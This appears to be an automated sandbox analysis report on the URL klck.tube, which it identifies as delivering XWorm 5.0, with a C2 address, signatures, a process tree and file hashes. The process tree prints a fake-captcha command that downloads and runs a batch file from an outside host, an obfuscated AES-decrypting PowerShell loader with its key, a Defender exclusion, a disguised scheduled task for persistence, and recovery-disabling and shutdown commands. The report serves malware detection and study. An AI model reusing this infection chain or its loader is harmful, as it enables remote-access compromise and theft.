Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
64s -
max time network
66s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
01/03/2025, 22:32
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://klck.tube
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral2
Sample
http://klck.tube
Resource
win11-20250217-en
Errors
Malware Config
Extracted
xworm
5.0
45.43.2.16:7232
jG2dh7zTLhyaOqCH
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/5456-147-0x000001EB38880000-0x000001EB3888E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 63 5456 powershell.exe 65 5456 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1860 powershell.exe 5728 powershell.exe 4644 powershell.exe 896 powershell.exe 5456 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 api.ipify.org 31 api.ipify.org -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery\ReAgent.xml reagentc.exe File opened for modification C:\Windows\system32\Recovery reagentc.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml reagentc.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml reagentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml reagentc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133853419331253465" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "117" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1056 chrome.exe 1056 chrome.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 1860 powershell.exe 1860 powershell.exe 1860 powershell.exe 896 powershell.exe 896 powershell.exe 896 powershell.exe 5456 powershell.exe 5456 powershell.exe 5456 powershell.exe 5728 powershell.exe 5728 powershell.exe 5728 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe Token: SeShutdownPrivilege 1056 chrome.exe Token: SeCreatePagefilePrivilege 1056 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe 1056 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5292 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1056 wrote to memory of 4748 1056 chrome.exe 84 PID 1056 wrote to memory of 4748 1056 chrome.exe 84 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 2100 1056 chrome.exe 85 PID 1056 wrote to memory of 3392 1056 chrome.exe 86 PID 1056 wrote to memory of 3392 1056 chrome.exe 86 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 PID 1056 wrote to memory of 3336 1056 chrome.exe 87 -
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 56 curl/8.7.1
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://klck.tube1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa9b2dcc40,0x7ffa9b2dcc4c,0x7ffa9b2dcc582⤵PID:4748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1824 /prefetch:22⤵PID:2100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2156 /prefetch:32⤵PID:3392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:82⤵PID:3336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3068 /prefetch:12⤵PID:4464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:12⤵PID:1156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3028,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:3592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3368,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3356 /prefetch:82⤵PID:4588
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4184
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat" && start "" "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot1⤵PID:1240
-
C:\Windows\system32\curl.execurl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat"2⤵PID:3916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot2⤵PID:4092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\mait.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot'));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4644 -
C:\Windows\system32\reagentc.exe"reagentc.exe" /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs"4⤵
- Checks computer location settings
PID:5344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat" "5⤵PID:5408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5456 -
C:\Windows\system32\reagentc.exe"reagentc.exe" /disable7⤵
- Drops file in Windows directory
PID:5568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5728
-
-
C:\Windows\system32\shutdown.exeshutdown.exe /f /s /t 07⤵PID:5152
-
-
-
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39ca855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5292
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD52f109a93596f30bfe940dff2ca9cac87
SHA10b0e244dcadf2484020ac223546359bc6dcc543e
SHA2560b21fc16268a8e89da9c00554efa79a3850e2832ad3422f4e9c177eb1751219a
SHA512ece805ea2d4fe4af803195c2403e09abe76aa5c352a6cb61ebe6956f761b7ba40232199b1846600ebb15b173d73cde3088017ca96a646c7d4b3fa25ed3a201a1
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD573131ac9671cf68564c8198d841e4e1c
SHA143f68970f2148dd8a8084acee089e41c5c266a35
SHA256f62da3550d693cff7d9f38879c23950d3eda98aaab45d07b512025ab41447028
SHA51256fd3cceb1834336e889350b3ad70e46a55e0201534049bdbdcf1671ad03113352a5da1297b2c996466fd85d399c8a48815c4bd4fdad6e5127e8c039715aa70e
-
Filesize
9KB
MD5974a64107b47b4998e93852077deb63f
SHA1f511e06f3c4cf2cfb0f5219033c3988df33e7e77
SHA256f03ff8758ee0463c6c8c1ebc32a1684e4a761f70f977172865ddb26cb0bad92e
SHA512760f1ac659cbbb7fdfc381ba615cdf97587c2d54addc8874042d706e421d6a1a6797ae8427ed242caa60f09e0f38f03f58eb91433eed64ef9c354f1f2a27356b
-
Filesize
9KB
MD528badf556fff1c5ee9757558d4ecfdf0
SHA191b6adf9ee650ee60966d943b360e4f38f463e1f
SHA2567a2b4f26df691d6f02ab31397985eb5f8d667937491e2086351ecf9542b2cc1c
SHA512a6206087f7c254ee0c5345b9056906886023365041f05cb94c9b951e1dffc066ee3ea88aa8a00c9f3389aecbd04728adda2579587dc277040716008b3bbe7928
-
Filesize
9KB
MD57b354e3fd2c92c920b0ef2ea6c5209c7
SHA1647b6ddbd3e3ef125ad21f0ddcafcc571184c50c
SHA25600b207257216d8d7be7f48e1a96831ad82079b7e92abbb6deb2087a1978bf463
SHA512a4dcc499fe19937e0ef3dbffc372b847526a652873a9a547f1a83b3610ba635808f1477db9bd0e131424bc3520ff8c9efd7355bff08bfeca4377405c5cd68390
-
Filesize
9KB
MD5292e172fdf2ba09486d14e5eeac651a7
SHA1857423cd0e13831a7bef8f907fcd0a5aa589ea91
SHA256edfadde425a2a04c07e46f9ed966a6d8652c216e085e42db18a13308b31def65
SHA512423ccbf4e4cca163d62f107ce3c8837586cfb28d2aa5c98e53493175b440ce9f6c4ba8ff23ad60c536410c20f73d3a30f85e4f0608c94275bd6ac35dd606be7b
-
Filesize
123KB
MD59bee302d4c307cb2d6834f6af5f426e4
SHA1feda7a99964a7f5660d58fb98f9bd7c316116d33
SHA256a04d3d40c4d1f7c65ea1f4be4e88564af2863e347eb5d4b030dea7c46bf95a65
SHA512c16a5efcb7ab3183ef93c177fd81cc76f9535ac1b2d2af9fb88cd0ad41259f9ef17c3d445c0f9cee23eb837a8d2afb588633b347166c5d5a1324d9209fc92065
-
Filesize
123KB
MD5839de52e3dcb053677223c1814a254d4
SHA11df767cbe638dd1c3d3a11870c83d576d5163388
SHA25654e225f9e690622906a047ed313f3b74425791a0cb6560607a7d763bb6dc143d
SHA512fa07beddc7f2933aa2fde164a7d845c3e02e6499d2e1c3b744f63e885d248eb8a0f321d8b08cd9d64ccba440abc194c263d609d8e63a5f6b2635f938751d17d9
-
Filesize
123KB
MD53aadfdb65d3626ba71033c98c6be1c5f
SHA174964d83ce4db519986b3307f2d042b68e1914cf
SHA25674e65e61bd4aba2d6594b688a07d51f2299ac290e46bde7cb31f5c492d01000b
SHA512d5be05f9668e4c1e5dc914b6c1faed1a8eac29e0f7a545066a7546372115eaf318f49c6628ba18516685c59e9378da4d1d05aa12eebabc70bbd7449e7a67dad6
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
